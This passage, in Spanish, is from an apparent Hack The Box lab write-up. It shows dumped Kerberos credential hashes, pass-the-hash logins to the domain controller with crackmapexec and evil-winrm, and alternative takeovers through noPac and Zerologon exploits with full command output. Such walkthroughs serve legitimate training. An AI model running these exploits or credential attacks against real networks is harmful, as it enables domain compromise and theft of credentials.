htb.local\awardel:aes128-cts-hmac-sha1-96:2d619944af0976beaf6f9b3c529665e6
htb.local\awardel:des-cbc-md5:3d9852e5e5fe08d9
VDESKTOP3$:aes256-cts-hmac-sha1-96:0dfdb6fb02b612d20e71f7c352eb918c7cc12679fa71d33ece0d4bff1602c452
VDESKTOP3$:aes128-cts-hmac-sha1-96:775c3974a30607b87ee1485bb849d1f8
VDESKTOP3$:des-cbc-md5:3de3b9c40da7cbc4
VDESKTOP2$:aes256-cts-hmac-sha1-96:67f8834883f679e28326b9c416ee0772a976cbc89fa904df407441fd763e623e
VDESKTOP2$:aes128-cts-hmac-sha1-96:baddab259a607c381adf118bf9bedf8b
VDESKTOP2$:des-cbc-md5:d32aa48326d585f8
VDESKTOP1$:aes256-cts-hmac-sha1-96:c0b601d91c47b8561cd3b8a41602b2dab6156d21135f52d92685fd4b71137794
VDESKTOP1$:aes128-cts-hmac-sha1-96:f1876be811720aec380948053a2bfa9e
VDESKTOP1$:des-cbc-md5:ec15c8269798e076
htb.local\xenserver-svc:aes256-cts-hmac-sha1-96:e93ba34ca8302dcfd988471ca49705c19078297ba4b2a554e6ef2f56bd2606d0
htb.local\xenserver-svc:aes128-cts-hmac-sha1-96:17af7b322987bb99a9961620a7ea54c5
htb.local\xenserver-svc:des-cbc-md5:5eb9a8fb91c75d57
htb.local\print-svc:aes256-cts-hmac-sha1-96:8e1a24efa266b33c1e5cfd5de1c678b29d0ef2d24f22eec48fe180f869d7dd2c
htb.local\print-svc:aes128-cts-hmac-sha1-96:7761dc9a8c9d579233bf0f9e4fa9a76e
htb.local\print-svc:des-cbc-md5:5dec430437e68a52
htb.local\mssql-svc:aes256-cts-hmac-sha1-96:7c9cbd4961788963c434e2d68e5d10eeb0b31432d54c5f97c67a3aec5841334d
htb.local\mssql-svc:aes128-cts-hmac-sha1-96:7bbe39d16a768bcb90a2845388654fab
htb.local\mssql-svc:des-cbc-md5:a2899257cbc86e3b
htb.local\mturner:aes256-cts-hmac-sha1-96:3fd0741a675313dcccbc9d15326aca33157da79adbf29b983e0b99cda27be9d2
htb.local\mturner:aes128-cts-hmac-sha1-96:6364145fad3f59dc79992a0abdea551c
htb.local\mturner:des-cbc-md5:3415c8b9fdad377a
htb.local\app-svc:aes256-cts-hmac-sha1-96:b4ac26617c753a88429e9ab336426ef3ef0d4d4915f45db0b80e62bfcc8fc2a5
htb.local\app-svc:aes128-cts-hmac-sha1-96:9f2601ed8d2a622b363937fd605e7e75
htb.local\app-svc:des-cbc-md5:a2b6dce3cd02ab34
htb.local\rprakash:aes256-cts-hmac-sha1-96:a44f3db333a59f90b6ade01b6f7d22a5da2059315b119f05bc755053c132967f
htb.local\rprakash:aes128-cts-hmac-sha1-96:e36ddd0004eca6a394e1a790c5389148
htb.local\rprakash:des-cbc-md5:f7da54b940981a97
LAPTOP1$:aes256-cts-hmac-sha1-96:41fca391ab1ca4c39b98342da3ee718e9e53795f65d254cb28ff3e12a6b56c24
LAPTOP1$:aes128-cts-hmac-sha1-96:bb3c3e49cc4bb7de0284a5fbebf3dd79
LAPTOP1$:des-cbc-md5:23f4912fdfe9c7cb
LAPTOP2$:aes256-cts-hmac-sha1-96:f06bf5b3959cfc0bedb1f7f52c9d89d2ff419bb264e4f50135bf2513a20ce019
LAPTOP2$:aes128-cts-hmac-sha1-96:fe47a3b3c1b7c5d2063855aa34cb9edf
LAPTOP2$:des-cbc-md5:df4c769e0e5b76da
LAPTOP3$:aes256-cts-hmac-sha1-96:26d72e03fa8f066546b1a9ed81da1e531554574d7e792066293c28b10dc07ff5
LAPTOP3$:aes128-cts-hmac-sha1-96:ef548fd68edc04c648fc028d14fef6ae
LAPTOP3$:des-cbc-md5:adf73151a2dfaba8
LAPTOP5$:aes256-cts-hmac-sha1-96:3aea19a0f81ee5953aed4f9f120b62631d98cfa5fd79fd72feee31c4b7d9e683
LAPTOP5$:aes128-cts-hmac-sha1-96:07947532a1ba3d85ae9a0af0ead03df5
LAPTOP5$:des-cbc-md5:a14683bfec10041c
LAPTOP6$:aes256-cts-hmac-sha1-96:08ff2ca4a5b08b38cda01283e30ac6c5060b7df1b1a31704ce999e1e6f82e826
LAPTOP6$:aes128-cts-hmac-sha1-96:1c3c09621a71454d68628ea8ad7f3efb
LAPTOP6$:des-cbc-md5:daae0794ae9b4c45
htb.local\urquarti:aes256-cts-hmac-sha1-96:8b16b04964ee76e1dd552aec8ae9d0a5814f5540cfc1633e82d94a83ac0b44bf
htb.local\urquarti:aes128-cts-hmac-sha1-96:95020927b31af43490b318a71c7c6d30
htb.local\urquarti:des-cbc-md5:73513b1c7a254ab6
htb.local\rdrew:aes256-cts-hmac-sha1-96:9b5a0c3331c19aa3f2105a8ac580c8517420ec1eb0dbc9f628fa75a90c430c9b
htb.local\rdrew:aes128-cts-hmac-sha1-96:2cb7d0a1c8e47e57622b2c4cef38f653
htb.local\rdrew:des-cbc-md5:7fbca7bafd52ece9
htb.local\fboucher:aes256-cts-hmac-sha1-96:cf0901292925026c6016e2a4cce50754dead6aeb5c0810be574b340a240c037b
htb.local\fboucher:aes128-cts-hmac-sha1-96:5a9f7dcf35f69a2910af82d275950f64
htb.local\fboucher:des-cbc-md5:2067374fefc1d56e
htb.local\cmeller:aes256-cts-hmac-sha1-96:87a86ed952630e3bac9b8af26d5e6f0c1d600f80b8de68f447c03f12f0089b83
htb.local\cmeller:aes128-cts-hmac-sha1-96:0d5f1803002032e36b232454de023d25
htb.local\cmeller:des-cbc-md5:cea14a45751fb3cb
htb.local\anagy:aes256-cts-hmac-sha1-96:7db3d41cfd047cae47e535bb9dd081803fbd9d506ed4fccf61ee68942953785f
htb.local\anagy:aes128-cts-hmac-sha1-96:ef235f741cb6e0aaf96233ff44e36b9b
htb.local\anagy:des-cbc-md5:6de0203d1a4cea02
WK01$:aes256-cts-hmac-sha1-96:b15ed9285ad9eb4f657e6c53d9208c1f93eacf7a7ffe60ed1d66900c69932a14
WK01$:aes128-cts-hmac-sha1-96:92eadcddca5722eb4852c3c7695bd675
WK01$:des-cbc-md5:45012970c2fd978c
WK02$:aes256-cts-hmac-sha1-96:b360f46dc8c76522508e4ce7c057f5c54ff97633855260f007a394e10d1d6fe9
WK02$:aes128-cts-hmac-sha1-96:c616f6b97592811ffd188981e47013a8
WK02$:des-cbc-md5:fbf45d5407700438
WK03$:aes256-cts-hmac-sha1-96:d687ad11c23ee33f915f02d187c102a64a9f965353dce728af483af32d373253
WK03$:aes128-cts-hmac-sha1-96:99ffe501a1b9315de908581a479a1905
WK03$:des-cbc-md5:f74f8564641cc2d9
WK04$:aes256-cts-hmac-sha1-96:4ecc004e82e349c692f30cb28cd69336f1eb07440ea74ea1b53fcc97d2afda79
WK04$:aes128-cts-hmac-sha1-96:e265b80c714ac59416acc4665a0c3191
WK04$:des-cbc-md5:a801d36429f4b9da
WK05$:aes256-cts-hmac-sha1-96:8d76ad3a60a32ea9584c5fd045f64668c1387a251981d5457aeac93ba3920b14
WK05$:aes128-cts-hmac-sha1-96:3168586f11bac1f16633a2cdc755018b
WK05$:des-cbc-md5:6ea191fe7a85a8f4
WK06$:aes256-cts-hmac-sha1-96:f9d5d01712e4b873e2e7588f635f9373476b7eab58757b68137c9240697da1d4
WK06$:aes128-cts-hmac-sha1-96:cbe9710ee38dc52d4c3cf68fd7c44a4f
WK06$:des-cbc-md5:4c027f2516857380
WK07$:aes256-cts-hmac-sha1-96:4f1cd1f1db09450ea89443cd8d3fbc98232457d61cfe20baeba492d94dbca7d6
WK07$:aes128-cts-hmac-sha1-96:810e5b35c75166108798e3ba275f0493
WK07$:des-cbc-md5:d920d6349b10154f
WK09$:aes256-cts-hmac-sha1-96:752ad9fa558cbf45543f8a2d0ebf1e9525f612d06cf48e1698785903e9ae738f
WK09$:aes128-cts-hmac-sha1-96:f06109d04b2a64af591c2b5d172ff2ef
WK09$:des-cbc-md5:cdbc866e6b3ddc16
htb.local\backup-svc:aes256-cts-hmac-sha1-96:628a8f9db4eb152717dca67e8d3c996827f02c2fdbfe2d427d783c369c86f328
htb.local\backup-svc:aes128-cts-hmac-sha1-96:ccd79fe595de98935f2dc557bcd175fb
htb.local\backup-svc:des-cbc-md5:7c916bfebfaee308
htb.local\test-svc:aes256-cts-hmac-sha1-96:8bc92a6544e449c9051c5b4a5e0a8c11908927d8e6409f58067f91b22f69051b
htb.local\test-svc:aes128-cts-hmac-sha1-96:99e7edfc2feee188005c71bff7d65c16
htb.local\test-svc:des-cbc-md5:136b917097e69149
htb.local\netscaler-svc:aes256-cts-hmac-sha1-96:b81fce62fe63a6240ca8e4bb04d6700ca6c2d0a9a3e614db5811879291a04b99  
htb.local\netscaler-svc:aes128-cts-hmac-sha1-96:bdaaa24b4d91a8ce54eb9f62c60ec162
htb.local\netscaler-svc:des-cbc-md5:f18a4c4cd34a2a52
[*] Cleaning up...

Con crackmapexec comprobamos el hash de Administrator sobre el dominio, al ser valido tenemos comprometido el DC y todos los equipos asociados al dominio

❯ crackmapexec smb 172.16.249.200-205 -u Administrator -H 822601ccd7155f47cd955b94af1558be 
SMB         172.16.249.201  445    CITRIX           [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:CITRIX) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         172.16.249.205  445    VDESKTOP3        [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:VDESKTOP3) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)
SMB         172.16.249.201  445    CITRIX           [+] htb.local\Administrator:822601ccd7155f47cd955b94af1558be (Pwn3d!)
SMB         172.16.249.205  445    VDESKTOP3        [+] htb.local\Administrator:822601ccd7155f47cd955b94af1558be (Pwn3d!)
SMB         172.16.249.200  445    DC               [+] htb.local\Administrator:822601ccd7155f47cd955b94af1558be (Pwn3d!)

Simplemente nos conectamos con evil-winrm como el usuario Administrator al DC haciendo un passthehash y obtenemos una shell, finalmente leemos la flag

❯ evil-winrm -i 172.16.249.200 -u Administrator -H 822601ccd7155f47cd955b94af1558be  
PS C:\Users\Administrator\Documents> whoami
htb\administrator
PS C:\Users\Administrator\Documents> hostname
DC
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
XEN{d3r1v471v3_d0m41n_4dm1n}
PS C:\Users\Administrator\Documents>


Extra 1

CVE-2021-42278 / CVE-2021-42287 - DC Administrator


Como alternativa podemos usar noPac, al explotarlo indicando el parametro -shell nos otorgara una cmd como el usuario nt authority\system directamente en el DC

❯ python3 noPac.py htb.local/pmorgan:Summer1Summer! -dc-ip 172.16.249.200 -use-ldap -shell

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target dc.htb.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-SEPUBVA8LHE$"
[*] MachineAccount "WIN-SEPUBVA8LHE$" password = 0$)qspgbzEhK
[*] Successfully added machine account WIN-SEPUBVA8LHE$ with password 0$)qspgbzEhK.
[*] WIN-SEPUBVA8LHE$ object = CN=WIN-SEPUBVA8LHE,CN=Computers,DC=htb,DC=local
[*] WIN-SEPUBVA8LHE$ sAMAccountName == dc
[*] Saving a DC's ticket in dc.ccache
[*] Reseting the machine account to WIN-SEPUBVA8LHE$
[*] Restored WIN-SEPUBVA8LHE$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_dc.htb.local.ccache
[*] Attempting to del a computer with the name: WIN-SEPUBVA8LHE$
[-] Delete computer WIN-SEPUBVA8LHE$ Failed! Maybe the current user does not have permission.  
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
DC

C:\Windows\system32>


Extra 2

CVE-2020-1472 - DC Administrator


Como alternativa podemos ejecutar la vuln de zerologon hacia el DC, el servidor es vulnerable y logramos cambiar la contraseña del equipo por una cadena vacia

❯ python3 cve-2020-1472-exploit.py DC 172.16.249.200
Performing authentication attempts...
==========================================================================  
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!

Autenticandonos como el equipo DC$ con una cadena vacia como contraseña podemos hacer un DCSync y ver el hash NT del usuario Administrator

❯ crackmapexec smb 172.16.249.200 -u DC$ -p '' --ntds drsuapi --user Administrator
SMB         172.16.249.200  445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         172.16.249.200  445    DC               [+] htb.local\DC$: 
SMB         172.16.249.200  445    DC               [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         172.16.249.200  445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         172.16.249.200  445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be:::

Finalmente podemos simplemente conectarnos con evil-winrm como el usuario Administrator al DC haciendo un passthehash y obtenemos una powershell

❯ evil-winrm -i 172.16.249.200 -u Administrator -H 822601ccd7155f47cd955b94af1558be  
PS C:\Users\Administrator\Documents> whoami
htb\administrator
PS C:\Users\Administrator\Documents> hostname
DC
PS C:\Users\Administrator\Documents>